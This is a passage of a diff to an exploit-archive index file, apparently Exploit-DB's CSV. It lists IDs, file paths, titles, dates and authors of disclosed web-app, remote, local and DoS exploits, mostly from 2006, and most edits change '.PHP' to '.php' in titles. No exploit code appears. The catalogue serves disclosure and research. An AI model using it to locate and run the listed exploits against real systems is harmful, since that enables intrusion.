RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 +28283,platforms/hardware/webapps/28283.txt,"ZyXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory Vulnerability",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability",2006-07-27,"Dedi Dwianto",linux,local,0 -28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 Payment.PHP Remote File Include Vulnerability",2006-07-27,admin@jaascois.com,php,webapps,0 -28290,platforms/php/webapps/28290.txt,"MyBulletinBoard 1.x UserCP.PHP Cross-Site Scripting Vulnerability",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 -28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x UserCP.PHP Directory Traversal Vulnerability",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 -28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 +28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 Payment.php Remote File Include Vulnerability",2006-07-27,admin@jaascois.com,php,webapps,0 +28290,platforms/php/webapps/28290.txt,"MyBulletinBoard 1.x UserCP.php Cross-Site Scripting Vulnerability",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 +28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x UserCP.php Directory Traversal Vulnerability",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 +28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28293,platforms/multiple/dos/28293.txt,"Oracle 10g Alter Session Integer Overflow Vulnerability",2006-07-27,"putosoft softputo",multiple,dos,0 -28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP Modules.PHP Cross-Site Scripting Vulnerability",2006-07-28,l2odon,php,webapps,0 +28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP Modules.php Cross-Site Scripting Vulnerability",2006-07-28,l2odon,php,webapps,0 28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-comments-post.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-feed.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation Vulnerability",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability",2006-07-29,"Mr. Niega",windows,dos,0 -28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 +28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability",2006-07-29,hdm,windows,dos,0 28302,platforms/php/webapps/28302.txt,"Liga Manager Online 2.0 Joomla! Component Remote File Include Vulnerability",2006-07-30,vitux.manis,php,webapps,0 -28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 Protect.PHP SQL Injection Vulnerability",2006-07-29,SirDarckCat,php,webapps,0 -28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 Top.PHP SQL Injection Vulnerability",2006-07-29,SirDarckCat,php,webapps,0 +28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 Protect.php SQL Injection Vulnerability",2006-07-29,SirDarckCat,php,webapps,0 +28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 Top.php SQL Injection Vulnerability",2006-07-29,SirDarckCat,php,webapps,0 28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injection Vulnerabilities",2006-07-31,CR,php,webapps,0 -28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.PHP Remote File Include Vulnerability",2006-07-31,saudi.unix,php,webapps,0 -28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.PHP Remote File Include Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 +28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.php Remote File Include Vulnerability",2006-07-31,saudi.unix,php,webapps,0 +28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.php Remote File Include Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 28314,platforms/linux/remote/28314.c,"bomberclone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 -28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.PHP Directory Traversal Vulnerability",2006-07-31,Dr.GooGle,php,webapps,0 +28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.php Directory Traversal Vulnerability",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie Quick_Path Parameter Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 -28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script Index.PHP Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 +28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script Index.php Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 28320,platforms/php/webapps/28320.txt,"Knusperleicht GuestBook 3.5 GB_PATH Parameter Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 -28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 Error.PHP Information Disclosure Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 -28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 UpdatePF.PHP Authentication Bypass Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 +28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 Error.php Information Disclosure Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 +28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 UpdatePF.php Authentication Bypass Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 28324,platforms/php/webapps/28324.txt,"Blackboard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x war.php page Parameter XSS",2006-08-03,mfoxhacker,php,webapps,0 @@ -25396,8 +25396,8 @@ id,file,description,date,author,platform,type,port 28343,platforms/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability",2006-08-06,"Thomas Pollet",windows,dos,0 28344,platforms/multiple/remote/28344.txt,"DConnect Daemon Listen Thread UDP Remote Buffer Overflow Vulnerability",2006-08-06,"Luigi Auriemma",multiple,remote,0 28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat Denial of Service Vulnerability",2006-08-06,"Luigi Auriemma",multiple,dos,0 -28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 -28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 Profile.PHP Multiple SQL Injection Vulnerabilities",2006-08-07,"Chris Boulton",php,webapps,0 +28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.php Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 +28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 Profile.php Multiple SQL Injection Vulnerabilities",2006-08-07,"Chris Boulton",php,webapps,0 28348,platforms/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x UPX Compressed PE File Heap Buffer Overflow Vulnerability",2006-08-07,"Damian Put",linux,dos,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Include Vulnerabilities",2006-08-07,Matdhule,php,webapps,0 28350,platforms/php/webapps/28350.txt,"VWar 1.5 war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 @@ -25414,14 +25414,14 @@ id,file,description,date,author,platform,type,port 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow Vulnerability",2006-08-07,"Luigi Auriemma",multiple,dos,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 Security Bypass Vulnerability",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL-Injection Vulnerability",2006-08-09,ASIANEAGLE,php,webapps,0 -28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 Profile.PHP Directory Traversal Vulnerability",2006-08-09,"Chris Boulton",php,webapps,0 -28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability",2006-08-09,"Susam Pal",multiple,remote,0 +28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 Profile.php Directory Traversal Vulnerability",2006-08-09,"Chris Boulton",php,webapps,0 +28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure Vulnerability",2006-08-09,"Susam Pal",multiple,remote,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x Mybloggie_Root_Path Parameter Multiple Remote File Include Vulnerabilities",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 ANI Image File Denial of Service Vulnerability",2006-08-09,sehato,windows,dos,0 -28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.PHP Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 -28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x Index.PHP Cross-Site Scripting Vulnerability",2006-08-10,O.U.T.L.A.W,php,webapps,0 +28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.php Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 +28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x Index.php Cross-Site Scripting Vulnerability",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities",2006-08-10,x0r0n,php,webapps,0 28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 Ascan_6.ASP ActiveX Control Cross-Site Scripting Vulnerability",2006-08-10,Lostmon,windows,remote,0 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal Vulnerability",2006-08-10,"Tassi Raeburn",windows,remote,0 @@ -25429,10 +25429,10 @@ id,file,description,date,author,platform,type,port 28376,platforms/windows/remote/28376.html,"McKesson ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 -28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 +28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.php Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 -28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.PHP - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 +28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 @@ -25440,11 +25440,11 @@ id,file,description,date,author,platform,type,port 28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability",2006-08-15,nop,windows,dos,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module Local File Include Vulnerability",2006-08-15,MosT3mR,php,webapps,0 28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service Vulnerability",2006-08-15,nop,windows,dos,0 -28390,platforms/php/webapps/28390.txt,"Lizge 20 - Index.PHP Multiple Remote File Include Vulnerabilities",2006-08-15,Crackers_Child,php,webapps,0 +28390,platforms/php/webapps/28390.txt,"Lizge 20 - Index.php Multiple Remote File Include Vulnerabilities",2006-08-15,Crackers_Child,php,webapps,0 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x XML Handler Race Condition Memory Corruption Vulnerability",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload Vulnerability",2013-09-19,SANTHO,asp,webapps,0 -28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.PHP Remote File Include Vulnerability",2006-08-16,Crackers_Child,php,webapps,0 +28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.php Remote File Include Vulnerability",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow Vulnerability",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 @@ -25459,49 +25459,49 @@ id,file,description,date,author,platform,type,port 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution",2013-09-20,xistence,php,remote,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability",2006-08-21,O.U.T.L.A.W,php,webapps,0 -28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 -28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay Index.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 +28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 +28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay Index.php Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x dohtaccess.html dir Parameter XSS",2006-08-21,preth00nker,php,webapps,0 28414,platforms/php/webapps/28414.txt,"cPanel 10.x editit.html file Parameter XSS",2006-08-21,preth00nker,php,webapps,0 28415,platforms/php/webapps/28415.txt,"cPanel 10.x showfile.html file Parameter XSS",2006-08-21,preth00nker,php,webapps,0 28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component mosConfig_absolute_path Remote File Include Vulnerability",2006-08-21,O.U.T.L.A.W,php,webapps,0 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x TCMS_Administer Parameter Remote File Include Vulnerability",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 -28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic Index.PHP Remote File Include Vulnerability",2006-08-21,night_warrior771,php,webapps,0 +28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic Index.php Remote File Include Vulnerability",2006-08-21,night_warrior771,php,webapps,0 28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 -28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 -28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0 +28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 +28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0 28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure Vulnerability",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution Vulnerability",2006-08-18,anonymous,novell,local,0 -28428,platforms/php/webapps/28428.txt,"Yapig 0.9x Thanks_comment.PHP Cross-Site Scripting Vulnerability",2006-10-13,Kuon,php,webapps,0 +28428,platforms/php/webapps/28428.txt,"Yapig 0.9x Thanks_comment.php Cross-Site Scripting Vulnerability",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 -28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 Index.PHP Remote File Include Vulnerability",2006-08-26,D3nGeR,php,webapps,0 -28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.PHP Remote File Include Vulnerability",2006-08-26,D3nGeR,php,webapps,0 +28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 Index.php Remote File Include Vulnerability",2006-08-26,D3nGeR,php,webapps,0 +28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Include Vulnerability",2006-08-26,D3nGeR,php,webapps,0 28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x MyajaxPHP.PHP Remote File Include Vulnerability",2006-08-26,night_warrior771,php,webapps,0 -28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability",2006-08-26,Matdhule,php,webapps,0 +28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x MyajaxPHP.php Remote File Include Vulnerability",2006-08-26,night_warrior771,php,webapps,0 +28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin.class.php Remote File Include Vulnerability",2006-08-26,Matdhule,php,webapps,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow Vulnerability",2006-08-28,XSec,windows,remote,0 -28439,platforms/php/webapps/28439.txt,"HLstats 1.34 Hlstats.PHP Cross-Site Scripting Vulnerability",2006-08-29,kefka,php,webapps,0 +28439,platforms/php/webapps/28439.txt,"HLstats 1.34 Hlstats.php Cross-Site Scripting Vulnerability",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Include Vulnerabilities",2006-08-29,sCORPINo,php,webapps,0 -28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 Comments.PHP SQL Injection Vulnerability",2006-08-30,Hessam-x,php,webapps,0 +28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 Comments.php SQL Injection Vulnerability",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass Vulnerability",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 ASP SQL Injection Vulnerability",2006-08-30,FarhadKey,asp,webapps,0 28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Include Vulnerabilities",2006-08-30,night_warrior771,php,webapps,0 -28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x Functions_Post.PHP Cross-Site Scripting Vulnerability",2006-08-30,imei,php,webapps,0 -28446,platforms/php/webapps/28446.txt,"HLstats 1.34 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 -28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.PHP SQL Injection Vulnerability",2006-08-30,"James Bercegay",php,webapps,0 +28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x Functions_Post.php Cross-Site Scripting Vulnerability",2006-08-30,imei,php,webapps,0 +28446,platforms/php/webapps/28446.txt,"HLstats 1.34 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 +28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.php SQL Injection Vulnerability",2006-08-30,"James Bercegay",php,webapps,0 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 -28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.PHP SQL Injection Vulnerability",2006-08-30,DarkFig,php,webapps,0 -28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.PHP Cross-Site Scripting Vulnerability",2006-08-30,DarkFig,php,webapps,0 +28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.php SQL Injection Vulnerability",2006-08-30,DarkFig,php,webapps,0 +28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.php Cross-Site Scripting Vulnerability",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com Learncenter.ASP Cross-Site Scripting Vulnerability",2006-08-30,Crack_MaN,php,webapps,0 28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Include Vulnerabilities",2006-08-31,Matdhule,php,webapps,0 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Include Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 @@ -25519,10 +25519,10 @@ id,file,description,date,author,platform,type,port 28461,platforms/php/webapps/28461.txt,"ezContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service Vulnerability",2006-09-01,"David Matousek",windows,dos,0 -28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.PHP Cross-Site Scripting Vulnerability",2006-09-01,Crack_MaN,php,webapps,0 +28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.php Cross-Site Scripting Vulnerability",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Include Vulnerability",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include Vulnerability",2006-09-01,Ironfist,php,webapps,0 -28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.PHP SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0 +28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 